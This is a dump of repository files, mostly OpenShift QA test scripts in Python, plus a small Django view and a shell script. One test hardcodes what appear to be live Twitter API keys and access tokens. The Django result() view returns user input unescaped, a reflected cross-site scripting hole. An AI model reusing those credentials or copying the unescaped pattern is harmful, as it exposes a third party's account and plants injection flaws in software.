common\nfrom jbossas_prebuilt_wars_without_jenkins import JBossHotDeployPrebuiltWarsWithoutJenkins\n\nclass EAPHotDeployPrebuiltWarsWithoutJenkins(JBossHotDeployPrebuiltWarsWithoutJenkins):\n 
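# Thin subclass: the hot-deploy scenario is inherited wholesale from the JBoss AS\n    # variant; only the cartridge type and summary are overridden for EAP6.\n    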
def __init__(self, config):\n        JBossHotDeployPrebuiltWarsWithoutJenkins.__init__(self, config)\n        self.config.application_type = common.app_types['jbosseap']\n        self.config.summary = \"[US2443] Hot deployment support for Jboss EAP6 application with 2 pre-built wars\"\n    \nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(EAPHotDeployPrebuiltWarsWithoutJenkins)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n" }, { "alpha_fraction": 0.615717351436615, "alphanum_fraction": 0.6330209374427795, "avg_line_length": 29.811111450195312, "blob_id": "33c8e87fa991af5fd3b0a526507a62dfa88c4803", "content_id": "80e211f4d77357f44c4409b05491a74b82b5c811", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2774, "license_type": "no_license", "max_line_length": 211, "num_lines": 90, "path": "/automation/open/testmodules/UI/web/case_180948.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_180948.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n    def initialize(self):\n        pass\n\n    def finalize(self):\n        pass\n\n\nclass CreateRubyAndRailsAppAndChangeDomainName(OpenShiftTest):\n    def test_method(self):\n        web = self.config.web\n\n        web.login()\n\n        #create a Ruby on Rails app\n        #web.create_app(\"rails\",\"rubyonrails\")\n        web.create_app(\"rails\", \"rubyonrails\")\n        \n        time.sleep(20)\n        web.assert_text_equal_by_xpath('''Your application has been created. If you're new to OpenShift check out these tips for where to go next.''', '''//div[@id='content']/div/div/div/div[2]/div/section/p''')\n        \n        \n        #go to my account page and change domain name\n        web.go_to_domain_edit()\n        web.input_by_id(\"domain_name\",\"yujzhangcccc\")\n        web.click_element_by_id(\"domain_submit\")\n        time.sleep(10)\n        
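# The flash notice below confirms the rename; public app URLs switch to the new domain immediately.\n        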
web.assert_text_equal_by_xpath(\"Your domain has been changed. Your public URLs will now be different\",'''//div[@id='content']/div/div/div/div[2]/div/div/div''') \n\n        #check the url after changing the domain name\n        web.go_to_app_detail(\"rubyonrails\")\n        web.assert_text_equal_by_xpath(\"http://rubyonrails-yujzhangcccc.stg.rhcloud.com/\",'''//div[@id='content']/div/div/div/div[2]/nav/div/a''')\n        \n\n        #change the domain name back\n        web.go_to_domain_edit()\n        web.input_by_id(\"domain_name\",\"yujzhang\")\n        web.click_element_by_id(\"domain_submit\")\n        time.sleep(10)\n        web.assert_text_equal_by_xpath(\"Your domain has been changed. Your public URLs will now be different\",'''//div[@id='content']/div/div/div/div[2]/div/div/div''') \n\n        \n        #web.delete_last_app(\"rubyonrails\")\n        web.go_to_app_detail(\"rubyonrails\")\n        time.sleep(2)\n        web.click_element_by_link_text(\"Delete this application\")\n        time.sleep(1)\n        web.click_element_by_name(\"commit\")\n        time.sleep(60)\n        web.assert_text_equal_by_xpath('''Create your first application now!''', '''//div[2]/div/div/div''')\n        \n\n\n        self.tearDown()\n\n        return self.passed(\" case_180948--CreateRubyAndRailsAppAndChangeDomainName passed successfully.\")\n\n\n    def tearDown(self):\n        self.config.web.driver.quit()\n        self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(CreateRubyAndRailsAppAndChangeDomainName)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# end of case_180948.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6851063966751099, "alphanum_fraction": 0.6851063966751099, "avg_line_length": 26.647058486938477, "blob_id": "59098b95ca2593cb23281a01f134bdd774060e2f", "content_id": "d6249493263afa722c0acdd9f1311749d885c4a9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 470, "license_type": "no_license", "max_line_length": 69, "num_lines": 17, "path": "/ajaxtest/mysite/views.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "# Create your views here.\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render_to_response\n\ndef test_ajax(request):\n    \"\"\"Render the Ajax test page\"\"\"\n    return render_to_response('test_page.html')\n\n\ndef result(request):\n    \"\"\"Return the search result for the submitted value\"\"\"\n    if 'ipt_value' in request.GET:\n        message = 'Searched result is: %s' % request.GET['ipt_value']\n    else:\n        message = 'You submitted an empty form'\n    return HttpResponse(message)\n" }, { "alpha_fraction": 0.5193093419075012, "alphanum_fraction": 0.5261631608009338, "avg_line_length": 36.004878997802734, "blob_id": "5e8c9f702b40432f9251020b1481b3fa2ac012e4", "content_id": "accd534be9c8654890a6c3404c5a9c70c1081325", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 7587, "license_type": "no_license", "max_line_length": 152, "num_lines": 205, "path": "/automation/open/testmodules/RT/cartridge/snapshot_restore_mongodb.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/python\n\n#\n# File name: snapshot_restore_mongodb.py\n# Date: 2012/03/20 13:47\n# Author: [email protected]\n#\n\nimport os\nimport common\nimport rhtest\nimport OSConf\n\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False\n\n    def initialize(self):\n        self.info(\"[US1209][RT][cartridge]take snapshot and restore without new app for embedded mongodb\")\n        self.app_name = common.getRandomString(10)\n        try:\n            self.app_type = self.get_variant()\n        except:\n            self.app_type = 'jbossews'\n        try:\n            self.scalable = self.config.tcms_arguments['scalable']\n        except:\n            self.scalable = False\n        self.mongo_type = \"mongodb\"\n\n        self.info(\"VARIANT: %s\"%self.app_type)\n        self.info(\"SCALABLE: %s\"%self.scalable)\n        self.snapshot_file = \"snapshot_%s.tar.gz\"%self.app_name\n\n        common.env_setup()\n\n    def finalize(self):\n        pass\n\nclass SnapshotRestoreMongodb(OpenShiftTest):\n    def test_method(self):\n        #1\n        if self.scalable:\n            self.add_step(\"Create scalable %s 
application\"%self.app_type,\n common.create_scalable_app,\n function_parameters=[self.app_name, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n False],\n expect_return=0)\n else:\n self.add_step(\"Create a %s application\"%self.app_type,\n common.create_app,\n function_parameters=[self.app_name, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n True],\n expect_return=0)\n\n #2\n self.add_step(\"Embed with mongodb\" ,\n common.embed,\n function_parameters = [self.app_name,\n 'add-%s'%common.cartridge_types[self.mongo_type],\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_return=0)\n\n if self.scalable:\n self.add_step(\"Scale up...\",\n #self.config.rest_api.app_scale_up,\n common.scale_up,\n function_parameters = [self.app_name],\n expect_return=0)\n\n self.add_step(\"Insert initial data into mongoDB\",\n self.process_mongo_data,\n function_parameters = ['insert', '{\"name1\": \"Tim\" }'],\n expect_return=0)\n\n self.add_step(\"Insert initial data into mongoDB\",\n self.process_mongo_data,\n function_parameters = ['insert', '{\"name1\": \"Jim\" }'],\n expect_return=0)\n\n self.add_step(\"Verify recent insert into mongoDB\",\n self.process_mongo_data,\n function_parameters = ['find', '{\"name1\": \"Jim\" }', \"Jim\"],\n expect_description = 'Entry of \"Jim\" should be there...',\n expect_return=0)\n\n self.add_step(\"Verify recent insert into mongoDB\",\n self.process_mongo_data,\n function_parameters = ['find', '{\"name1\": \"Tim\" }', \"Tim\"],\n expect_description = 'Entry of \"Tim\" should be there...',\n expect_return=0)\n\n self.add_step(\"Make a snapshot\",\n \"rhc snapshot save %s -l %s -p '%s' -f %s %s\"\n %(self.app_name,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n self.snapshot_file,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0)\n\n #6\n self.add_step(\"Drop the initial data from mongoDB\",\n self.process_mongo_data,\n function_parameters=['remove', '{\"name1\": \"Jim\" }'],\n expect_description = 'Jim should be removed without errors...',\n expect_return=0)\n\n self.add_step(\"Insert Tom into mongoDB\",\n self.process_mongo_data,\n function_parameters=['insert', '{\"name1\": \"Tom\" }'],\n expect_description = 'Tom should be added without errors...',\n expect_return=0)\n\n #7\n self.add_step(\"Verify recent drop from mongoDB\",\n self.process_mongo_data,\n function_parameters=['find', '{\"name1\": \"Jim\" }',None,\"Jim\"],\n expect_description = '\"Jim\" should not be there...',\n expect_return = 1)\n \n self.add_step(\"Verify recent insert to mongoDB\",\n self.process_mongo_data,\n function_parameters=['find', '{\"name1\": \"Tom\" }', \"Tom\"],\n expect_description = '\"Tom\" should be there...',\n expect_return=0)\n \n #8\n self.add_step(\"Restore from snapshot\",\n \"rhc snapshot restore %s -l %s -p '%s' -f %s %s\"\n %(self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, self.snapshot_file, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'Should pass',\n expect_return=0)\n\n #9\n self.add_step(\"Check if the Tim is there\",\n self.process_mongo_data,\n function_parameters = ['find', '{\"name1\": \"Tim\"}', \"Tim\"],\n expect_description = 'Tim should be there there.',\n expect_return = 0)\n\n self.add_step(\"Check if the Jim is there\",\n self.process_mongo_data,\n function_parameters = ['find', '{\"name1\": \"Jim\"}', \"Jim\"],\n 
expect_description = 'Jim should be there.',\n expect_return = 0)\n\n self.run_steps()\n\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n def process_mongo_data(self, operation, data, expect_str=None, unexpect_str=None):\n mongo_cred = OSConf.get_embed_info(self.app_name, common.cartridge_types[self.mongo_type])\n \n #print mongo_cred\n #print mongo_cred[\"username\"]\n script = \"db.test.%s(%s)\"%(operation, data)\n if (operation == 'find'):\n script += \".forEach(printjson)\"\n script += \";\"\n\n js_script = \"/tmp/m.js\"\n mongo_cmds = \"echo 'use %s;' >%s\"%(self.app_name,js_script)\n mongo_cmds += \"; echo '%s' >>%s\"%(script, js_script)\n mongo_cmds += \"; mongo --verbose -u %s -p %s %s:%s/admin < %s \"%(\n mongo_cred[\"username\"],\n mongo_cred[\"password\"],\n mongo_cred['url'],\n mongo_cred['port'],\n js_script)\n if operation == 'find':\n mongo_cmds += \" | grep ObjectId \"\n\n (status, output) = common.run_remote_cmd(self.app_name, mongo_cmds)\n\n if expect_str:\n self.assert_match(expect_str, output, \"Unable to find `%s` string in the output.\"%expect_str)\n if unexpect_str:\n self.assert_not_match(unexpect_str, output, \"Unexpected `%s` string in the output.\"%unexpect_str)\n\n return status\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SnapshotRestoreMongodb)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of snapshot_restore_mongodb.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5469971299171448, "alphanum_fraction": 0.557673990726471, "avg_line_length": 31.774999618530273, "blob_id": "f734e57f1721c9f3b6118606d06386bf17e8587d", "content_id": "c1d3df0965f77fe92fcaff50f21bb1567da39164", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5245, "license_type": "no_license", "max_line_length": 163, "num_lines": 160, "path": "/automation/open/testmodules/RT/node/public_tcp_proxy.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: public_tcp_proxy.py\n# Date: 2012/02/14 01:32\n# Author: [email protected]\n#\n\nimport sys\nimport os\nimport re\n\nimport rhtest\nimport testcase, common, OSConf\n\nHOST=None\nPORT=None\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1371][Runtime][Horizontal Scaling] Public TCP proxy solution\"\n self.app_name1 = 'ctrapp1'\n self.app_name2 = 'ctrapp2'\n self.app_type = 'php'\n tcms_testcase_id = 130875\n self.steps = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s %s\"%(self.app_name1, self.app_name2))\n\nclass PublicTcpProxy(OpenShiftTest):\n def test_method(self):\n self.steps.append(testcase.TestCaseStep(\n \"Deploy app1\", \n common.create_app,\n function_parameters = [self.app_name1, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, True],\n expect_return=0))\n\n self.steps.append(testcase.TestCaseStep(\n \"Deploy app2\",\n common.create_app,\n function_parameters = [self.app_name2, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, True],\n expect_return = 0))\n\n \n self.steps.append(testcase.TestCaseStep(\n \"Call Expose hook the public ports\",\n self.expose_port,\n function_parameters = [self.app_name1],\n expect_return = 0))\n\n self.steps.append(testcase.TestCaseStep(\n \"Modify 
the app2 to communicate (as client)\" , \n            self.add_client,\n            function_parameters = [self.app_name2],\n            expect_return=0))\n\n        self.steps.append(testcase.TestCaseStep(\"Check the communication.\",\n            self.verify_proxy,\n            function_parameters = [self.app_name2],\n            expect_return=0,\n            expect_description=\"It should return a response from CtrApp1\"))\n\n        case = testcase.TestCase(self.summary, self.steps)\n        case.run()\n        common.destroy_app(self.app_name1, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n        common.destroy_app(self.app_name2, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n        os.system(\"rm -Rf %s\" % self.app_name1)\n        os.system(\"rm -Rf %s\" % self.app_name2)\n        \n        if case.testcase_status == 'PASSED':\n            return self.passed(\"%s passed\" % self.__class__.__name__)\n        if case.testcase_status == 'FAILED':\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\n    def verify_proxy(self, app_name):\n        url = OSConf.get_app_url(app_name)\n        return common.grep_web_page(\"%s/client.php\"%url, 'Welcome to OpenShift')\n    \n    def add_client(self, app_name):\n        cmd = '''\ncd %s &&\ncat <<'EOF' >php/client.php &&\n<?php\n  error_reporting(E_ALL);\n  print \"Hello from client.php<hr/>\";\n  $port = %s;\n  $host = \"%s\";\n  $url = \"$host:$port\";\n  print \"$url\";\n  $error_FH = fopen(\"error.log\",\"w\") or die(\"Unable to open stderr log file.\");\n  $ch = curl_init();\n  curl_setopt($ch, CURLOPT_URL, $url);\n  curl_setopt($ch, CURLOPT_HEADER, 1);\n  curl_setopt($ch, CURLOPT_STDERR, $error_FH);\n  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\n  curl_setopt($ch, CURLOPT_VERBOSE, 1);\n  print \"<pre>\";\n  print curl_exec($ch);\n  print \"</pre>\";\n  curl_close($ch);\n  print \"<hr/>client.php done.\";\n?> \nEOF\n git add php/client.php &&\n git commit -a -m \"Added client.php\" &&\n git push\n    '''%(app_name, PORT, HOST)\n        (status, output) = common.command_getstatusoutput(cmd)\n        return status\n\n    def expose_port(self, app_name):\n        global HOST\n        global PORT\n        uuid = OSConf.get_app_uuid(app_name)\n        cmd = '/usr/libexec/openshift/cartridges/%s/info/hooks/expose-port %s %s %s ' % (common.app_types[self.app_type], app_name, common.get_domain_name(), uuid)\n        (status, output) = common.run_remote_cmd(None, cmd, as_root=True)\n\n        if status != 0:\n            return status\n\n        obj = re.search(r\".*PROXY_HOST=(.*)\", output, re.MULTILINE)\n        if obj:\n            host = obj.group(1)\n            obj = re.search(r\".*PROXY_PORT=(\\d+)\", output, re.MULTILINE)\n            if obj:\n                HOST = host\n                PORT = obj.group(1)\n            else:\n                print \"ERROR: Unable to capture PROXY_PORT\"\n                return -1\n        else:\n            print \"ERROR: Unable to capture PROXY_HOST\"\n            return -1\n\n        return status\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(PublicTcpProxy)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# end of public_tcp_proxy.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6026058793067932, "alphanum_fraction": 0.6108449697494507, "avg_line_length": 39.765625, "blob_id": "6ae169d7a71774760297aba0169c097af6fb61a8", "content_id": "12cc3ee1be6e05586b0b9fed374d4c7231cc6c66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5219, "license_type": "no_license", "max_line_length": 375, "num_lines": 128, "path": "/automation/open/testmodules/RT/cartridge/jboss_sample_applications.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nJiangtao 
Zhao\[email protected]\nFeb 10, 2012\n[rhc-cartridge]JBoss cartridge: three sample applications test\nhttps://tcms.engineering.redhat.com/case/122280/\n\"\"\"\nimport os,sys,re,time\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge]JBoss cartridge: three sample applications test\" \n # test_name should be among tweetstream,kitchensink\n try:\n self.test_variant = self.config.test_variant\n except:\n self.info(\"Missing OPENSHIFT_test_name, using `tweetstream` from [kitchensinkHtml5, tweetstream,kitchensink]\")\n self.test_variant = 'tweetstream'\n\n self.app_name = self.test_variant\n self.app_type = common.app_types[\"jbossas\"]\n self.git_repo = \"./%s\" % (self.app_name)\n\n common.env_setup()\n\n self.steps_list = []\n\n def finalize(self):\n pass\n\nclass JbossSampleApplications(OpenShiftTest):\n\n def test_method(self):\n # 1.Create an app\n self.steps_list.append( testcase.TestCaseStep(\n \"1. Create an jbossas app for %s test\" % (self.test_variant),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n \n # 2.Git remote add and pull\n testname_to_giturl = { \n \"kitchensinkHtml5\" : \"git://github.com/openshift/kitchensink-html5-mobile-example.git\",\n \"tweetstream\" : \"git://github.com/openshift/tweetstream-example.git\",\n \"kitchensink\" : \"git://github.com/openshift/kitchensink-example.git\"}\n\n git_url = testname_to_giturl[self.test_variant]\n self.steps_list.append( testcase.TestCaseStep(\"2.Git remote add and pull\",\n \"cd %s && git remote add upstream -m master %s && git pull -s recursive -X theirs upstream master\" % (self.git_repo, git_url),\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n\n # 3.Make some changes to the git repo\n if self.test_variant == \"kitchensinkHtml5\":\n cmd = \"touch %s/testemptyfile\" % (self.git_repo)\n elif self.test_variant == \"tweetstream\":\n cmd = \"cd %s/tweetstream/src/main/resources/ && sed -i -e 's/consumerKey=/consumerKey=HdPuX8kwhFQtcHesyMlDcQ/' twitter4j.properties && sed -i -e 's/consumerSecret=/consumerSecret=XsMdF9qYCPlQOMxwoAgBJtEumW2DSGtBkABfxj21I/' twitter4j.properties && sed -i -e 's/accessToken=/accessToken=356040597-o6ev08uMGXFuGBlNahwxYwE9IaOBJnoaneUbP7Y/' twitter4j.properties && sed -i -e 's/accessTokenSecret=/accessTokenSecret=x9c1KUQUUp4JZ7cV5X91jfPEqRhFOHhyLGOtIzSFq5A/' twitter4j.properties\" % (self.git_repo)\n elif self.test_variant == \"kitchensink\":\n cmd = \"cd %s && echo \\\"HelloKitchensink\\\">>testfile.txt\" % (self.git_repo)\n else:\n raise Exception(\"Invalid self.test_variant\")\n\n self.steps_list.append( testcase.TestCaseStep(\"3.Make some changes to the git repo\",\n cmd,\n expect_description=\"Made changes successfully\",\n expect_return=0))\n\n # 4.Git push all the changes\n self.steps_list.append( testcase.TestCaseStep(\"2.Git push all the changes\",\n \"cd %s && git add . 
&& git commit -am t && git push\" % (self.git_repo),\n            expect_description=\"the changes should be pushed successfully\",\n            expect_return=0))\n\n        # 5.Check the app via browser\n        def get_app_url(app_name, suffix):\n            def get_app_url2():\n\n                return OSConf.get_app_url(app_name)+suffix\n            return get_app_url2\n\n        suffix = \"\"\n        if self.test_variant == \"kitchensinkHtml5\":\n            test_html = \"HTML5 form element & validation\"\n        elif self.test_variant == \"tweetstream\":\n            test_html = \"Top Tweeters\"\n            suffix = \"/pages/home.jsf\"\n        elif self.test_variant == \"kitchensink\":\n            test_html = \"member\"\n            suffix += \"/rest/members\"\n        self.steps_list.append( testcase.TestCaseStep(\"5.Check the app via browser\",\n            common.grep_web_page,\n            function_parameters=[get_app_url(self.app_name, suffix), test_html, \"-H 'Pragma: no-cache'\", 5, 9],\n            expect_description=\"'%s' should be found in the web page\" % (test_html),\n            expect_return=0))\n\n        case = testcase.TestCase(self.summary, self.steps_list)\n        try:\n            case.run()\n        except testcase.TestCaseStepFail:\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\n        if case.testcase_status == 'PASSED':\n            return self.passed(\"%s passed\" % self.__class__.__name__)\n        if case.testcase_status == 'FAILED':\n            return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(JbossSampleApplications)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5793335437774658, "alphanum_fraction": 0.5851421356201172, "avg_line_length": 30.152381896972656, "blob_id": "1b5d56d7f4fb5c711956e37977d6b76b4bf1598c", "content_id": "41c94b003a145da0e981dd5df9e3152a99241cf0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3271, "license_type": "no_license", "max_line_length": 167, "num_lines": 105, "path": "/automation/open/testmodules/RT/limits/nproc.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\ntests_dir = sys.path.append([testdir,\"/tests/\"])\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n    INTERACTIVE = False\n\n    def initialize(self):\n        self.app_name = common.getRandomString(10)\n        self.app_type = common.app_types['php']\n        self.max_procs = 250\n\n        common.env_setup()\n        self.steps_list = []\n\n    def finalize(self):\n        os.system(\"rm -Rf %s\" % ( self.app_name ))\n\n\nclass Nproc(OpenShiftTest):\n    def check_nproc(self, number):\n        print \"The max count of procs is: %s\" % number\n        if int(number) < self.max_procs:\n            return 0\n        return 1\n\n    def test_method(self):\n        step = testcase.TestCaseStep(\n            \"Create an %s app: %s\" % (self.app_type, self.app_name),\n            common.create_app,\n            function_parameters = [self.app_name, self.app_type],\n            expect_description = \"App should be created successfully\",\n            expect_return = 0)\n        self.steps_list.append(step)\n        tests_dir=os.path.join(testdir, \"testmodules/RT/\")\n        \n        
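# Patch the fork count in the template's nproc.php to max_procs; the later\n        # steps read back how many processes the gear actually allowed.\n        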
%d\\\"/' %s/php/nproc.php\"% (tests_dir, self.app_name, self.max_procs, self.app_name),\n expect_return = 0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\n \"Git push codes\",\n \"cd %s && git add . && git commit -am 'update app' && git push\" % self.app_name,\n expect_return = 0)\n self.steps_list.append(step)\n\n step = testcase.TestCaseStep(\n \"get app URL\",\n common.get_app_url_from_user_info,\n function_parameters = [self.app_name])\n self.steps_list.append(step)\n\n #5\n step = testcase.TestCaseStep(\n \"check feedback\",\n \"curl --fail --silent --max-time 300 -H 'Pragma: no-cache' __OUTPUT__[4]/nproc.php | grep max: | awk -F' ' '{ print $8 }'\",\n expect_return = 0)\n self.steps_list.append(step)\n\n #6\n step = testcase.TestCaseStep(\n \"check the number of processes\",\n self.check_nproc,\n function_parameters = ['__OUTPUT__[5]'],\n expect_return = 0)\n step.add_clean_up(common.destroy_app, [self.app_name])\n self.steps_list.append(step)\n\n case = testcase.TestCase(\"[rhc-limits] numuber of processes limit\", self.steps_list)\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(Nproc)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5881595611572266, "alphanum_fraction": 0.6132560968399048, "avg_line_length": 22.89230728149414, "blob_id": "a8693413cd48e64876205c546bc4fbec2d7a02fc", "content_id": "3a1f1aa555fe8dc88727c1d003b61c2dc08f6789", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1554, "license_type": "no_license", "max_line_length": 159, "num_lines": 65, "path": "/automation/open/testmodules/UI/web/case_138602.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_138602.py\n# Date: 2012/07/25 10:56\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n pass\n\n def finalize(self):\n pass\n\n\nclass Add_Invalid_Sshkey_Name(OpenShiftTest):\n def test_method(self):\n web = self.config.web\n web.login()\n \n #Add SSHKey with invalid name\n web.go_to_account_page()\n time.sleep(10)\n web.go_to_account_page()\n web.input_by_id(\"key_raw_content\", \"ffffffff\")\n web.click_element_by_id(\"key_submit\")\n time.sleep(10)\n \n web.input_by_id(\"key_name\", \"####\")\n web.clear_element_value(\"key_raw_content\")\n web.input_by_id(\"key_raw_content\", \"ssh-rsa aaaa\") \n web.click_element_by_id(\"key_submit\")\n time.sleep(10)\n web.assert_text_equal_by_xpath('''Invalid key name. 
web.assert_text_equal_by_xpath('''Invalid key name. Name must only contain alphanumeric characters.''', '''//div[@id='key_name_input']/div/p''') \n\n        self.tearDown()\n\n        return self.passed(\"Case 138602 test passed.\")\n\n\n    def tearDown(self):\n        self.config.web.driver.quit()\n        self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = OpenShiftTestSuite(conf)\n    suite.add_test(Add_Invalid_Sshkey_Name)\n    return suite\n\ndef run(conf):\n    suite = get_suite(conf)\n    suite()\n\n#\n# end of case_138602.py \n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.7519999742507935, "alphanum_fraction": 0.7599999904632568, "avg_line_length": 30.25, "blob_id": "527b48e45dff2c26ec13815da9dfae798aaa668a", "content_id": "93adb56513242a2626a51399e26965ea7b3cac07", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 125, "license_type": "no_license", "max_line_length": 72, "num_lines": 4, "path": "/automation/open/Longevity/app_operation_test.sh", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/bin/bash\n. ./function.sh\napp_operations=\"status start restart reload stop force-stop tidy delete\"\nrun app_oper_testing $1\n" }, { "alpha_fraction": 0.5938228368759155, "alphanum_fraction": 0.6247086524963379, "avg_line_length": 23.154930114746094, "blob_id": "35ee47d0f926140279db27eaf90a536002dd06b7", "content_id": "55ac8ba07af33bcbf5916a8ce8b4bed4614dfa38", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1716, "license_type": "no_license", "max_line_length": 135, "num_lines": 71, "path": "/automation/open/testmodules/UI/web/case_174360.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n# coding=utf-8\n#\n# File name: case_174360.py\n# Date: 2012/07/17 11:23\n# Author: [email protected] \n#\n\nimport rhtest\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n    def initialize(self):\n        pass\n\n    def finalize(self):\n        pass\n\n\nclass CreateAppWithoutSSHKey(OpenShiftTest):\n    def test_method(self):\n        web = self.config.web\n\n        web.login()\n        #web.delete_app(\"ruby19\")\n        #create a ruby1.9 app\n        web.create_app(\"ruby-1.9\",\"ruby19\")\n\n        #check whether the links are correct\n        time.sleep(5)\n        \n        #check the sshkey part\n        web.assert_text_equal_by_xpath(\"Set your Public Key\",'''//div[@id='content']/div/div/div/div[2]/div/section[2]/div/div/h4''') \n        \n        #delete the ruby app\n        web.go_to_app_detail(\"ruby19\")\n        time.sleep(2)\n        web.click_element_by_link_text(\"Delete this application\")\n        time.sleep(1)\n        web.click_element_by_id(\"application_submit\")\n        time.sleep(40)\n        web.go_to_app_detail(\"ruby19\")\n        web.assert_text_equal_by_xpath(\"Sorry, but the page you were trying to view does not exist.\", '''//article/div/p''')\n\n\n        self.tearDown()\n\n        return self.passed(\" case_174360--CreateAppWithoutSSHKey passed successfully.\")\n\n\n    def tearDown(self):\n        self.config.web.driver.quit()\n        self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n    pass\n\ndef get_suite(conf):\n    suite = 